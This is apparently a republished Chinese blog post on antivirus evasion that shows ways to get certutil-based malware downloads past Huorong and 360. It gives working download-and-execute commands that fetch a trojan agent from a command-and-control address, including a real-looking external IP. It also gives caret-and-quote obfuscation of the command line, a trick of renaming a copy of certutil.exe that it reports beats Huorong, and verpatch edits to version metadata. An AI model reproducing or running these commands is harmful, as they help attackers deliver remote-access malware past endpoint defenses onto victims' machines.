免杀学习-从指令绕过开始(2)

admin 2023年8月26日16:19:04评论34 views字数 1787阅读5分57秒阅读模式

certutil指令绕过

上次我们的免杀成功的绕过了联网360,但在半个月后就被无情的杀掉了,原因和火绒的报错一致是因为敏感指令certutil导致了报警,那么我们本次学习的主题就是如何绕过certutil的报警

那我们先看看通过cetutil指令进行下载的时候,他们的参数都有着什么作用

-f
覆盖现有文件。
有值的命令行选项。后面跟要下载的文件 url。
-split
保存到文件。
无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。
-URLCache
显示或删除URL缓存条目。
无值的命令行选项。
(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。)

可以在命令后面加上 delete指令删除缓存

查看缓存

certutil -urlcache *

免杀学习-从指令绕过开始(2)


看个缓存360直接报错了,因此可以判断是否目前360对于certutil的防御策略中有一项是针对我们的certutil的字符进行限制

执行删除缓存

certutil -urlcache * delete

绕过火绒

我们首先看看破晓中给我们的certutil的下载语句

certutil -urlcache -gmt -split -f http://127.0.0.1:1338/d/pzxsnoqd pzxsnoqd.exe && pzxsnoqd.exe agent -u http://127.0.0.1:1338 -s e75tdmwe

我们首先看看下载语句

certutil -urlcache -gmt -split -f http://127.0.0.1:1338/d/pzxsnoqd pzxsnoqd.exe

免杀学习-从指令绕过开始(2)

会直接报警,防护提示显示是利用certutil下载可执行文件

语句上混淆(×)

我们调换四个带横线句子的顺序看看能否完成绕过

certutil -urlcache -gmt -split -f http://127.0.0.1:1338/d/pzxsnoqd pzxsnoqd.exe

无论怎么换,依旧报警即无法实现原有的字符混淆

尝试添加干扰参数(×)

添加一些无关参数

certutil -a -urlcache -gmt -split -f http://127.0.0.1:1338/d/pzxsnoqd pzxsnoqd.exe

添加了一些无关字段还是会报警

尝试从命令执行语句的构造上绕过(×)

除了常见的&和|命令外通过资料查找发现windows存在一些字符在命令执行的时候不会影响原语句的执行如:

p^i^n^g www.baidu.com

免杀学习-从指令绕过开始(2)

还有一个是利用双引号绕过

免杀学习-从指令绕过开始(2)

那么我们根据其特性进行类似构造

^c""^e^r^t""u^ti^l -u^r"l""""cache -gmt -split -f ht""tp://1"2"7.0.0.1:13""38/d/pzxsnoqd pzxsn""oqd.^e^""x""^e

炸裂还是不行

给certutil换个路径和文件名(√)

更换
copy c:windowssystem32certutil.exe c.exe
下载
a -urlcache -split -f http://43.143.224.232:1338/d/pzxsnoqd pzxsnoqd.exe

免杀学习-从指令绕过开始(2)

终于成功了,nice

免杀学习-从指令绕过开始(2)

远程连接也是成功的,实现了火绒的绕过

360绕过

那三板斧直接先给他来一下,既然火绒能绕过,360不得试试同样的方法行不行

免杀学习-从指令绕过开始(2)

及时将前面绕过火绒的四个方法排列组合也不太行,寻找别的方法

多次命令路径的切换(×)

将我们复制的a,再次复制命名为b再次执行还是报警

推测可能是分析了命令执行的行为

尝试动态绕过(⚪)

这里可能不算真正意义上的手动绕过我们利用工具一个三方的小巧好用的修改工具verpatch,经过测试只需要修改程序版本信息中InternalName字段的值,这里我们InternalName修改为空看看情况。

verpatch.exe zzz.exe /s InternalName ""

免杀学习-从指令绕过开始(2)

但最离谱的是我们在执行木马的时候居然报警了

免杀学习-从指令绕过开始(2)

这是非常炸裂的

以jpg文件下载下来,执行依旧不行

免杀学习-从指令绕过开始(2)

参考文献

https://www.freebuf.com/articles/endpoint/334548.html

https://xz.aliyun.com/t/9737#toc-1



原文链接:https://xz.aliyun.com/t/12760#toc-7

原文始发于微信公众号(亿人安全):免杀学习-从指令绕过开始(2)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月26日16:19:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀学习-从指令绕过开始(2)http://cn-sec.com/archives/1980734.html

发表评论

匿名网友 填写信息